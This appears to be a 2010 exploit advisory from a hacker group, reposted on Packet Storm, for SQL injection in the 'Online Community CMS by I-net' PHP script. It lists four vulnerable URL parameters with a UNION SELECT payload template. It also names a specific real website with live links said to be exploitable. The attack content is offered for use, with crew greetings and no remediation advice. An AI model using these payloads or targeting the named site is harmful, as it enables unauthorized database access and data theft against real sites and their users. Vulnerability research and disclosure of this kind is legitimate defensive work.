Online Community CMS By I-net suffers from a remote SQL injection vulnerability.
6330833ea35dc810e682231316831c43611616f09c9c61c10d7055dad6b86e86
# Exploit Title: Online Community CMS by I-net SQL Injection Vulnerability
# Date: 16-03-2010
# Author: Th3 RDX
# Software Link: www.i-netsolution.com/online-community-php-scripts.html
# Version:
# Tested on: Projects Made By Them
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Team I.C.W | www.IndiShell.in | Andhra Hackers | www.exploit-db.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to all Indian Cyber Warriors ,IndiShell, Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
th3rdx@gmail.com
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Online Community CMS by I-net SQL Injection Vulnerability
----- [ Vendor ] -----
http://www.i-netsolution.com/online-community-php-scripts.html
%\\
##############################################################################
##############################################################################
%//
----- [ Exploit (s) ] -----
Put [CODE] = SQL Injection Code
{e.g = Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6 (tables & column) }
[SQLi] http://server/onlinecommunity/view-blog-full.php?blid=69[CODE]
[SQLi] http://server/onlinecommunitys/mem-play-song-cnt.php?plid=23[CODE]
[SQLi] http://server/onlinecommunity/mem_videos-play-cnt.php?vdoid=41[CODE]
[SQLi] http://server/onlinecommunity/profile.php?mid=72[CODE]
%\\
##############################################################################
##############################################################################
%//
>>>>>> TESTED ON <<<<<<
----- [ Live Link (s) ] -----
[Link] http://www.zooosh.com/view-blog-full.php?blid=69%27[CODE]
[Link] http://www.zooosh.com/subchild-blog-categ.php?pid=20%27[CODE]
[Link] http://www.zooosh.com/view-blog-full.php?blid=44%27[CODE]
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 16 March 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed